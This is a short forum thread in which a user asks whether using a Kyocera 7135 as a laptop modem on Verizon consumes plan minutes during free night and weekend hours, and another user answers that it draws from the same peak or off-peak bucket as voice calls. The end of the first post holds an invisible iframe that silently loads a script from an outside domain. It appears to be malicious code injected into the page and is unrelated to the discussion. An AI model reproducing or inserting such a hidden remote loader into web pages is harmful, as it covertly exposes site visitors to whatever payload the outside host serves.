+ Reply to Thread

? on Verizon minutes with modem.

I called Verizon and just wanted to double check their answer here.

Afterall, their sales people in the stores are so knowledgable (Duh, what's the 7135, I ain't never seen one of those?)
    So I'm sure I can trust their customer service people to answer this question correctly.

My question is: when I'm in a hotel room and using the 7135 as a modem with my laptop to access the internet and my plan says free nights and weekends . . . does that mean I can use it for as long as I want without using up my minutes from my 400 min a month plan, during those unlimited hours. When I was a Sprint customer and used the 6035 as a modem, I had to paid an x-tra $10 a month to access their network and I was using up my minutes whatever time I was calling, even though I had unlimited weekend use. I had to get a 3000 min a month plan because of this.
    So the Verizon support person (this one even spoke "broken" English real well) said its free to use on weekends with the modem.
    Is this correct?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I assume you mean 14.4 data. If so, yes, for VZ it comes out of whatever current bucket (peak/offpeak) your voice calls come out of.

Thanks Kliuless.
    Palm III, V>6035>7135>6035>650>700p>755p (on Vzn), Palm's BT Treo Hdset,